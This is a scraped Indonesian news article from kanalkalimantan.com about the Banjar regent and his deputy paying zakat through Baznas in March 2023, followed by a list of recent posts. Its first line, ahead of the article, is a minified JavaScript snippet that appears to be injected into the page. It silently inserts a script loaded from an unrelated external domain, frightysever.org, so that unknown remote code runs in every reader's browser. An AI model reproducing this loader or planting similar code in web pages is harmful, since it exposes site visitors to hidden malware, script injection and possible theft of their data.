(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Saidi Mansyur dan Jajaran Salurkan Zakat Lewat Baznas


KANALKALIMANTAN.COM, MARTAPURA – Bupati Banjar H Saidi Mansyur dan Wabup Banjar Habib Idrus Alhabsyie mengikuti Keteladanan Pemimpin Daerah Berzakat Tahun 1444 H/2023, di Mahligai Sultan Adam, Martapura, Kamis (30/3/2023).

Dalam kesempatan itu H Saidi Mansyur mengajak semua untuk mengambil inspirasi dari kegiatan pembayaran zakat yang dilakukan oleh Presiden Joko Widodo, Wapres, para menteri dan direksi BUMN melalui Badan Amil Zakat Nasional (Baznas) di Istana Negara beberapa waktu lalu.

Menurut dia, kegiatan tersebut merupakan teladan  dalam menunaikan zakat melalui Baznas yang dapat menyalurkannya kepada mustahik yang membutuhkan secara tepat dan transparan.

Lebih lanjut Saidi Mansyur mengatakan, dalam Islam zakat memiliki peran yang sangat penting dalam kehidupan seorang muslim.

 

Baca juga: KPK Geledah Kantor BKPSDM dan Dinkes Kapuas, Bawa Keluar Koper Besar

Zakat bukan sekadar kewajiban tetapi merupakan salah satu cara dalam menunjukkan kepedulian dan kasih sayang terhadap sesama yang membutuhkan.

Bupati Banjar H Saidi Mansyur dan Wabup Banjar Habib Idrus Alhabsyie mengikuti Keteladanan Pemimpin Daerah Berzakat Tahun 1444 H/2023. Foto: DKISP Banjar

“Kita berupaya mengoptimalkan pengumpulan dan pendayagunaan zakat sebagai bentuk rasa syukur dan ketaatan kepada Allah SWT serta memberikan apresiasi kepada muzaki dan mustahik,” jelas bupati.

Dia berharap kegiatan dapat memberikan motivasi untuk meningkatkan kepedulian dan keteladanan dalam berzakat serta dapat memberikan manfaat besar bagi sesama.

Sementara itu Ketua Baznas Kabupaten Banjar, Nuryadi, berharap kegiatan rutin ini  dapat menggugah masyarakat lewat keteladanan pimpinan daerah dalam menyalurkan zakat, infaq dan sedekah melalui Baznas.

“Dengan support dari pak bupati dan wabub beserta jajarannya semoga dana yang terkumpul lebih dari cukup untuk diberikan kepada masyarakat yang terdampak bencana seperti banjir, kebakaran, kecelakaan dan program Baznas lainnya untuk meringankan beban masyarakat yang mendapatkan musibah,” tutup dia. (kanalkalimantan.com/kk)

Reporter: kk
Editor: Dhani


Al Ghifari

Recent Posts

Berbaur dengan Masyarakat, Bupati dan Wabup Banjar Nobar Indonesia Vs Uzbekistan

KANALKALIMANTAN.COM, MARTAPURA - Alun-alun Ratu Zalecha, Martapura dipilih menjadi tempat nonton bareng (nobar) Semi Final… Read More

2 jam ago

Diakhiri Nobar Timnas, Pj Bupati Kapuas Menutup Expo Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi secara resmi menutup gelaran Expo… Read More

5 jam ago

Bingkisan Kebahagiaan PLN untuk Warga Kalsel yang Membutuhkan

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur (UIP3B) Kalimantan melalui… Read More

5 jam ago

Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024

KANALKALIMANTAN.COM, BANJARMASIN - Nonton bareng (Nobar) laga semifinal AFC U-23 Indonesia vs Uzbekistan di halaman… Read More

5 jam ago

Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS – Tiga rekor Museum Rekor Indonesia (Muri) menjadi catatan kado Hari Jadi… Read More

5 jam ago

Ritual Laluhan dan Ngarunya Lengkapi Perayaan HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Momen perayaan Hari Jadi ke-218 Kota Kuala Kapuas dan Hari Ulang… Read More

5 jam ago

This website uses cookies.